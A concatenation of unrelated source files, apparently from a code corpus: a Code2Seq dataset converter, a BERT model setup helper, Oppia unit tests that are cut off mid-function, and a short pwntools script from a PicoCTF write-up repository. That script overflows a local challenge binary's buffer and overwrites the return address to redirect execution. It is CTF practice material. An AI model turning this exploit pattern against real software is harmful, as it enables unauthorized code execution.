"""Classes for converting the Code2Seq dataset to a PLUR dataset.
"""
import os
import tarfile
import apache_beam as beam
from plur.stage_1.plur_dataset import Configuration
from plur.stage_1.plur_dataset import PlurDataset
from plur.utils import constants
from plur.utils import util
from plur.utils.graph_to_output_example import GraphToOutputExample
from plur.utils.graph_to_output_example import GraphToOutputExampleNotValidError
import tqdm
class Code2SeqDataset(PlurDataset):
# pylint: disable=line-too-long
"""Converting data from code2seq dataset to a PLUR dataset.
The dataset is used in: Alon, Uri, et al. 'code2seq: Generating sequences from
structured representations of code.' arXiv preprint arXiv:1808.01400 (2018).
The task is to predict the function name given the function body.
The provided dataset by code2seq are the tokenized function name, and the AST
paths. Therefore we have to create our own graph representation of code2seq.
We try to mimic the code2seq model by constructing a graph similar to figure
3 in the code2seq paper. An example of such graph is shown in
https://drive.google.com/file/d/1-cH0FzYIMikgTkUpzVkEZDGjoiqBB9C1/view?usp=sharing.
In short, we build the AST path subtree and connects all AST paths with a
code2seq root node to make it a graph.
"""
_URLS_SMALL = {
'java-small-preprocessed.tar.gz': {
'url': 'https://s3.amazonaws.com/code2seq/datasets/java-small-preprocessed.tar.gz',
'sha1sum': '857c2495785f606ab99676c7bbae601ea2160f66',
}
}
_URLS_MED = {
'java-med-preprocessed.tar.gz': {
'url': 'https://s3.amazonaws.com/code2seq/datasets/java-med-preprocessed.tar.gz',
'sha1sum': '219e558ddf46678ef322ff75bf1982faa1b6204d',
}
}
_URLS_LARGE = {
'java-large-preprocessed.tar.gz': {
'url': 'https://s3.amazonaws.com/code2seq/datasets/java-large-preprocessed.tar.gz',
'sha1sum': 'ebc229ba1838a3c8f3a69ab507eb26fa5460152a',
}
}
# pylint: enable=line-too-long
_GIT_URL = {}
_DATASET_NAME = 'code2seq_dataset'
_DATASET_DESCRIPTION = """\
This dataset is used to train the code2seq model. The task is to predict the
function name, given the ast paths sampled the function AST. An AST path is
a path between two leaf nodes in the AST.
"""
def __init__(self,
stage_1_dir,
configuration: Configuration = Configuration(),
transformation_funcs=(),
filter_funcs=(),
user_defined_split_range=(),
num_shards=1000,
seed=0,
dataset_size='small',
deduplicate=False):
# dataset_size can only be 'small', 'med' or 'large'.
valid_dataset_size = {'small', 'med', 'large'}
if dataset_size not in valid_dataset_size:
raise ValueError('{} not in {}'.format(dataset_size,
str(valid_dataset_size)))
if dataset_size == 'small':
urls = self._URLS_SMALL
elif dataset_size == 'med':
urls = self._URLS_MED
else:
urls = self._URLS_LARGE
self.dataset_size = dataset_size
super().__init__(self._DATASET_NAME, urls, self._GIT_URL,
self._DATASET_DESCRIPTION, stage_1_dir,
transformation_funcs=transformation_funcs,
filter_funcs=filter_funcs,
user_defined_split_range=user_defined_split_range,
num_shards=num_shards, seed=seed,
configuration=configuration, deduplicate=deduplicate)
def download_dataset(self):
"""Download the dataset using requests and extract the tarfile."""
super().download_dataset_using_requests()
# Extract the tarfile depending on the dataset size.
if self.dataset_size == 'small':
self.code2seq_extracted_dir = os.path.join(
self.raw_data_dir, 'java-small')
tarfile_name = 'java-small-preprocessed.tar.gz'
elif self.dataset_size == 'med':
self.code2seq_extracted_dir = os.path.join(
self.raw_data_dir, 'java-med')
tarfile_name = 'java-med-preprocessed.tar.gz'
else:
self.code2seq_extracted_dir = os.path.join(
self.raw_data_dir, 'java-large')
tarfile_name = 'java-large-preprocessed.tar.gz'
tarfiles_to_extract = []
tarfiles_to_extract = util.check_need_to_extract(
tarfiles_to_extract, self.code2seq_extracted_dir,
tarfile_name)
for filename in tarfiles_to_extract:
dest = os.path.join(self.raw_data_dir, filename)
with tarfile.open(dest, 'r:gz') as tf:
for member in tqdm.tqdm(
tf.getmembers(),
unit='file',
desc='Extracting {}'.format(filename)):
tf.extract(member, self.raw_data_dir)
def get_all_raw_data_paths(self):
"""Get paths to all raw data."""
# Get the filenames depending on the dataset size.
if self.dataset_size == 'small':
train_file = os.path.join(
self.code2seq_extracted_dir, 'java-small.train.c2s')
validation_file = os.path.join(
self.code2seq_extracted_dir, 'java-small.val.c2s')
test_file = os.path.join(
self.code2seq_extracted_dir, 'java-small.test.c2s')
elif self.dataset_size == 'med':
train_file = os.path.join(
self.code2seq_extracted_dir, 'java-med.train.c2s')
validation_file = os.path.join(
self.code2seq_extracted_dir, 'java-med.val.c2s')
test_file = os.path.join(
self.code2seq_extracted_dir, 'java-med.test.c2s')
else:
train_file = os.path.join(
self.code2seq_extracted_dir, 'java-large.train.c2s')
validation_file = os.path.join(
self.code2seq_extracted_dir, 'java-large.val.c2s')
test_file = os.path.join(
self.code2seq_extracted_dir, 'java-large.test.c2s')
return [train_file, validation_file, test_file]
def raw_data_paths_to_raw_data_do_fn(self):
"""Returns a beam.DoFn subclass that reads the raw data."""
return C2SExtractor(super().get_random_split,
bool(self.user_defined_split_range))
def _construct_token_subtree(self, graph_to_output_example, token,
cur_node_id, token_root_name):
# pylint: disable=line-too-long
"""Construct the token subtree in a AST path.
We create a node for each subtoken in the token, all subtokens are connected
to the next subtoken via the 'NEXT_SUBTOKEN' edge. All subtokens are
connected to the token root node via the 'SUBTOKEN' edge. See the draw.io
figure mentioned in the class doc for the visualization.
Args:
graph_to_output_example: A GraphToOutputExample instance.
token: Starting or ending token in the AST path.
cur_node_id: Next available node id.
token_root_name: Node type and label for the token root node.
Returns:
A tuple of graph_to_output_example, cur_node_id, token_node_id.
graph_to_output_example is updated with the token subtree, cur_node_id is
the next available node id after all the token subtree nodes are added,
and token_node_id is the node id of the root token node.
"""
subtokens = token.split('|')
subtoken_node_ids = []
prev_subtoken_id = -1
# Create a node each subtoken.
for subtoken in subtokens:
graph_to_output_example.add_node(cur_node_id, 'SUBTOKEN', subtoken)
subtoken_node_ids.append(cur_node_id)
# Connects to the previous subtoken node
if prev_subtoken_id != -1:
graph_to_output_example.add_edge(prev_subtoken_id, cur_node_id,
'NEXT_SUBTOKEN')
prev_subtoken_id = cur_node_id
cur_node_id += 1
# Add a root node for the token subtree.
graph_to_output_example.add_node(cur_node_id, token_root_name,
token_root_name)
token_node_id = cur_node_id
cur_node_id += 1
# Connect all subtoken nodes to the token subtree root node.
for node_id in subtoken_node_ids:
graph_to_output_example.add_edge(token_node_id, node_id, 'SUBTOKEN')
return graph_to_output_example, cur_node_id, token_node_id
def _construct_ast_nodes_subtree(self, graph_to_output_example, ast_nodes,
cur_node_id):
"""Construct the AST nodes subtree in a AST path.
We create a node for each AST node in the AST path. Each AST node are
connected to the next AST node via the 'NEXT_AST_NODE' edge. See the draw.io
figure mentioned in the class doc for the visualization.
Args:
graph_to_output_example: A GraphToOutputExample instance.
ast_nodes: AST nodes in the AST path.
cur_node_id: Current available node id.
Returns:
A tuple of graph_to_output_example, cur_node_id, ast_node_ids.
graph_to_output_example is updated with the ast nodes subtree,
cur_node_id is the next available node id after all the ast nodes are
added, and ast_node_ids the node ids of all AST nodes.
"""
ast_nodes = ast_nodes.split('|')
ast_node_ids = []
prev_ast_node_id = -1
# Create a node each AST node.
for ast_node in ast_nodes:
graph_to_output_example.add_node(cur_node_id, 'AST_NODE', ast_node)
ast_node_ids.append(cur_node_id)
# Connects to the previous AST node.
if prev_ast_node_id != -1:
graph_to_output_example.add_edge(prev_ast_node_id, cur_node_id,
'NEXT_AST_NODE')
prev_ast_node_id = cur_node_id
cur_node_id += 1
return graph_to_output_example, cur_node_id, ast_node_ids
def raw_data_to_graph_to_output_example(self, raw_data):
# pylint: disable=line-too-long
"""Convert raw data to the unified GraphToOutputExample data structure.
The Code2Seq raw data contains the target function name, and the sampled
AST paths. Each AST path starts and ends with a token, and a series of
AST nodes that connects the two tokens. We use _construct_token_subtree
to build the token subtree and _construct_ast_nodes_subtree to build the
AST nodes subtree. Then, all AST paths' nodes are connected to a AST root
node.
All AST root nodes are connected to a single code2seq root node.
https://drive.google.com/file/d/1-cH0FzYIMikgTkUpzVkEZDGjoiqBB9C1/view?usp=sharing
shows an example of such a graph and the original AST path.
Args:
raw_data: A dictionary with 'split', 'target_label' and 'ast_paths' as keys.
The value of the 'split' field is the split (train/valid/test) that the
data belongs to. The value of the 'target_label' field is the function
name. The value of the 'ast_paths' field is a list of AST paths.
Raises:
GraphToOutputExampleNotValidError if the GraphToOutputExample is not
valid.
Returns:
A dictionary with keys 'split' and 'GraphToOutputExample'. Values are the
split(train/validation/test) the data belongs to, and the
GraphToOutputExample instance.
"""
# pylint: enable=line-too-long
split = raw_data['split']
target_label = raw_data['target_label']
ast_paths = raw_data['ast_paths']
graph_to_output_example = GraphToOutputExample()
cur_node_id = 0
ast_path_root_node_ids = []
# This is the root node of all AST path nodes.
graph_to_output_example.add_node(cur_node_id, 'C2C_ROOT', 'C2C_ROOT')
c2c_root_node_id = cur_node_id
cur_node_id += 1
for ast_path in ast_paths:
# The start_token subtree
start_token = ast_path[0]
graph_to_output_example, cur_node_id, start_token_node_id = (
self._construct_token_subtree(
graph_to_output_example, start_token, cur_node_id, 'START_TOKEN'))
# The ast_nodes subtree
ast_nodes = ast_path[1]
graph_to_output_example, cur_node_id, ast_node_ids = (
self._construct_ast_nodes_subtree(
graph_to_output_example, ast_nodes, cur_node_id))
# The end_token subtree
end_token = ast_path[2]
graph_to_output_example, cur_node_id, end_token_node_id = (
self._construct_token_subtree(
graph_to_output_example, end_token, cur_node_id, 'END_TOKEN'))
# Connects the start_token root node with the first node in the
# ast_nodes subtree.
graph_to_output_example.add_edge(
start_token_node_id, ast_node_ids[0], 'START_AST_PATH')
# Connects the end_token root node with the last node in the
# ast_nodes subtree.
graph_to_output_example.add_edge(
end_token_node_id, ast_node_ids[-1], 'END_AST_PATH')
# Add a root AST path node representing the AST path.
graph_to_output_example.add_node(
cur_node_id, 'ROOT_AST_PATH', 'ROOT_AST_PATH')
ast_path_root_node_id = cur_node_id
ast_path_root_node_ids.append(ast_path_root_node_id)
cur_node_id += 1
# Connects the root AST path node with the start_token and end_token
# subtree.
graph_to_output_example.add_edge(
ast_path_root_node_id, start_token_node_id, 'START_TOKEN')
graph_to_output_example.add_edge(
ast_path_root_node_id, end_token_node_id, 'END_TOKEN')
# Connects the root AST path node with all nodes in the ast_nodes subtree.
for node_id in ast_node_ids:
graph_to_output_example.add_edge(ast_path_root_node_id, node_id,
'AST_NODE')
# Connects the code2seq root node with all AST path root node.
for ast_path_root_node_id in ast_path_root_node_ids:
graph_to_output_example.add_edge(c2c_root_node_id, ast_path_root_node_id,
'AST_PATH')
for subtoken in target_label.split('|'):
graph_to_output_example.add_token_output(subtoken)
for transformation_fn in self.transformation_funcs:
graph_to_output_example = transformation_fn(graph_to_output_example)
if not graph_to_output_example.check_if_valid():
raise GraphToOutputExampleNotValidError(
'Invalid GraphToOutputExample found {}'.format(
graph_to_output_example))
for filter_fn in self.filter_funcs:
if not filter_fn(graph_to_output_example):
graph_to_output_example = None
break
return {'split': split, 'GraphToOutputExample': graph_to_output_example}
class C2SExtractor(beam.DoFn):
"""Class to read the code2seq dataset."""
def __init__(self, random_split_fn, use_random_split):
self.random_split_fn = random_split_fn
self.use_random_split = use_random_split
def _read_data(self, file_path):
"""Read and parse the code2seq raw data file.
Each line in the code2seq raw data file has the following format:
'<token> <token>,<node1>,<node2>,<token> <token>,<node3>,<token>'
The first token is the function name. The rest are the AST paths, separated
with a whitespace.
Args:
file_path: Path to a code2seq data file.
Yields:
A tuple of the function name, and a list of AST paths.
"""
with open(file_path) as f:
for line in f:
fields = line.rstrip().split(' ')
# The subtokens are still separated by '|', we handle them
# together in self.raw_data_to_graph_to_output_example()
target_label = fields[0]
ast_paths = []
for field in fields[1:]:
if field:
# The subtokens are still separated by '|', we handle them
# together in self.raw_data_to_graph_to_output_example()
ast_paths.append(field.split(','))
yield target_label, ast_paths
def _get_split(self, file_path):
"""Get the data split based on the filename suffix."""
if file_path.endswith('train.c2s'):
return constants.TRAIN_SPLIT_NAME
elif file_path.endswith('val.c2s'):
return constants.VALIDATION_SPLIT_NAME
else:
return constants.TEST_SPLIT_NAME
def process(self, file_path):
split = self._get_split(file_path)
for target_label, ast_paths in self._read_data(file_path):
yield {
'split': self.random_split_fn() if self.use_random_split else split,
'target_label': target_label,
'ast_paths': ast_paths
}
| google-research/plur | plur/stage_1/code2seq_dataset.py | Python | apache-2.0 | 16,900 |
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln')
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
gdbscript = '''
break *0x{exe.symbols.main:x}
continue
'''.format(**locals())
io = start()
payload = cyclic(76)
#payload = 'A'*64
payload += p32(0x80485e6)
io.sendline(payload)
io.interactive()
| Caesurus/CTF_Writeups | 2019-PicoCTF/exploits/exploit_overflow-1.py | Python | apache-2.0 | 624 |
# Copyright 2018 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Provides the setup for the experiments."""
from pytorch_pretrained_bert import modeling
from pytorch_pretrained_bert import tokenization
import torch
import embeddings_helper
def setup_uncased(model_config):
"""Setup the uncased bert model.
Args:
model_config: The model configuration to be loaded.
Returns:
tokenizer: The tokenizer to be used to convert between tokens and ids.
model: The model that has been initialized.
device: The device to be used in this run.
embedding_map: Holding all token embeddings.
"""
# Load pre-trained model tokenizer (vocabulary)
tokenizer = tokenization.BertTokenizer.from_pretrained(model_config)
# Load pre-trained model (weights)
model = modeling.BertModel.from_pretrained(model_config)
_ = model.eval()
# Set up the device in use
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print('device : ', device)
model = model.to(device)
# Initialize the embedding map
embedding_map = embeddings_helper.EmbeddingMap(device, model)
return tokenizer, model, device, embedding_map
def setup_bert_vanilla(model_config):
"""Setup the uncased bert model without embedding maps.
Args:
model_config: The model configuration to be loaded.
Returns:
tokenizer: The tokenizer to be used to convert between tokens and ids.
model: The model that has been initialized.
device: The device to be used in this run.
"""
# Load pre-trained model tokenizer (vocabulary)
tokenizer = tokenization.BertTokenizer.from_pretrained(model_config)
# Load pre-trained model (weights)
model = modeling.BertModel.from_pretrained(model_config)
_ = model.eval()
# Set up the device in use
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print('device : ', device)
model = model.to(device)
return tokenizer, model, device
def setup_bert_mlm(model_config):
"""Setup the uncased bert model with classification head.
Args:
model_config: The model configuration to be loaded.
Returns:
tokenizer: The tokenizer to be used to convert between tokens and ids.
model: The model that has been initialized.
device: The device to be used in this run.
"""
# Load pre-trained model tokenizer (vocabulary)
tokenizer = tokenization.BertTokenizer.from_pretrained(model_config)
# Load pre-trained model (weights)
model = modeling.BertForMaskedLM.from_pretrained('bert-base-uncased')
_ = model.eval()
# Set up the device in use
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print('device : ', device)
model = model.to(device)
# Initialize the embedding map
embedding_map = embeddings_helper.EmbeddingMap(device, model.bert)
return tokenizer, model, device, embedding_map
| PAIR-code/interpretability | text-dream/python/helpers/setup_helper.py | Python | apache-2.0 | 3,457 |
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for suggestion registry classes."""
from __future__ import annotations
import datetime
import os
from core import feconf
from core import utils
from core.domain import config_services
from core.domain import exp_domain
from core.domain import exp_fetchers
from core.domain import exp_services
from core.domain import fs_domain
from core.domain import fs_services
from core.domain import html_validation_service
from core.domain import question_domain
from core.domain import question_services
from core.domain import skill_services
from core.domain import state_domain
from core.domain import suggestion_registry
from core.domain import suggestion_services
from core.platform import models
from core.tests import test_utils
(suggestion_models,) = models.Registry.import_models([models.NAMES.suggestion])
class MockInvalidSuggestion(suggestion_registry.BaseSuggestion):
def __init__(self): # pylint: disable=super-init-not-called
pass
class BaseSuggestionUnitTests(test_utils.GenericTestBase):
"""Tests for the BaseSuggestion class."""
def setUp(self):
super(BaseSuggestionUnitTests, self).setUp()
self.base_suggestion = MockInvalidSuggestion()
def test_base_class_accept_raises_error(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement accept.'):
self.base_suggestion.accept()
def test_base_class_get_change_list_for_accepting_suggestion_raises_error(
self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement '
'get_change_list_for_accepting_suggestion.'):
self.base_suggestion.get_change_list_for_accepting_suggestion()
def test_base_class_pre_accept_validate_raises_error(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement'
' pre_accept_validate.'):
self.base_suggestion.pre_accept_validate()
def test_base_class_populate_old_value_of_change_raises_error(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement'
' populate_old_value_of_change.'):
self.base_suggestion.populate_old_value_of_change()
def test_base_class_pre_update_validate_raises_error(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement'
' pre_update_validate.'):
self.base_suggestion.pre_update_validate({})
def test_base_class_get_all_html_content_strings(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement'
' get_all_html_content_strings.'):
self.base_suggestion.get_all_html_content_strings()
def test_base_class_get_target_entity_html_strings(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement'
' get_target_entity_html_strings.'):
self.base_suggestion.get_target_entity_html_strings()
def test_base_class_convert_html_in_suggestion_change(self):
def conversion_fn():
"""Temporary function."""
pass
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseSuggestion should implement'
' convert_html_in_suggestion_change.'):
self.base_suggestion.convert_html_in_suggestion_change(
conversion_fn)
class SuggestionEditStateContentUnitTests(test_utils.GenericTestBase):
"""Tests for the SuggestionEditStateContent class."""
AUTHOR_EMAIL = '[email protected]'
REVIEWER_EMAIL = '[email protected]'
ASSIGNED_REVIEWER_EMAIL = '[email protected]'
fake_date = datetime.datetime(2016, 4, 10, 0, 0, 0, 0)
def setUp(self):
super(SuggestionEditStateContentUnitTests, self).setUp()
self.signup(self.AUTHOR_EMAIL, 'author')
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.suggestion_dict = {
'suggestion_id': 'exploration.exp1.thread1',
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': feconf.ENTITY_TYPE_EXPLORATION,
'target_id': 'exp1',
'target_version_at_submission': 1,
'status': suggestion_models.STATUS_ACCEPTED,
'author_name': 'author',
'final_reviewer_id': self.reviewer_id,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'state_1',
'new_value': 'new suggestion content',
'old_value': None
},
'score_category': 'content.Algebra',
'language_code': None,
'last_updated': utils.get_time_in_millisecs(self.fake_date),
'edited_by_reviewer': False
}
def test_create_suggestion_edit_state_content(self):
expected_suggestion_dict = self.suggestion_dict
observed_suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertDictEqual(
observed_suggestion.to_dict(), expected_suggestion_dict)
def test_validate_suggestion_edit_state_content(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
def test_get_score_part_helper_methods(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertEqual(suggestion.get_score_type(), 'content')
self.assertEqual(suggestion.get_score_sub_type(), 'Algebra')
def test_validate_suggestion_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.suggestion_type = 'invalid_suggestion_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected suggestion_type to be among allowed choices'
):
suggestion.validate()
def test_validate_target_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.target_type = 'invalid_target_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected target_type to be among allowed choices'
):
suggestion.validate()
def test_validate_target_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.target_id = 0
with self.assertRaisesRegex(
utils.ValidationError, 'Expected target_id to be a string'
):
suggestion.validate()
def test_validate_target_version_at_submission(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.target_version_at_submission = 'invalid_version'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected target_version_at_submission to be an int'
):
suggestion.validate()
def test_validate_status(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.status = 'invalid_status'
with self.assertRaisesRegex(
utils.ValidationError, 'Expected status to be among allowed choices'
):
suggestion.validate()
def test_validate_author_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.author_id = 0
with self.assertRaisesRegex(
utils.ValidationError, 'Expected author_id to be a string'
):
suggestion.validate()
def test_validate_author_id_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.author_id = self.PSEUDONYMOUS_ID
suggestion.validate()
suggestion.author_id = ''
with self.assertRaisesRegex(
utils.ValidationError,
'Expected author_id to be in a valid user ID format'
):
suggestion.validate()
def test_validate_final_reviewer_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.final_reviewer_id = 1
with self.assertRaisesRegex(
utils.ValidationError, 'Expected final_reviewer_id to be a string'
):
suggestion.validate()
def test_validate_final_reviewer_id_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.final_reviewer_id = self.PSEUDONYMOUS_ID
suggestion.validate()
suggestion.final_reviewer_id = ''
with self.assertRaisesRegex(
utils.ValidationError,
'Expected final_reviewer_id to be in a valid user ID format'
):
suggestion.validate()
def test_validate_score_category(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 0
with self.assertRaisesRegex(
utils.ValidationError, 'Expected score_category to be a string'
):
suggestion.validate()
def test_validate_score_category_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 'score.score_type.score_sub_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected score_category to be of the form'
' score_type.score_sub_type'
):
suggestion.validate()
suggestion.score_category = 'invalid_score_category'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected score_category to be of the form'
' score_type.score_sub_type'
):
suggestion.validate()
def test_validate_score_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 'invalid_score_type.score_sub_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the first part of score_category to be among allowed'
' choices'
):
suggestion.validate()
def test_validate_change(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change = {}
with self.assertRaisesRegex(
utils.ValidationError, 'Expected change to be an ExplorationChange'
):
suggestion.validate()
def test_validate_score_type_content(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 'question.score_sub_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the first part of score_category to be content'
):
suggestion.validate()
def test_validate_change_cmd(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionEditStateContent(
expected_suggestion_dict['suggestion_id'],
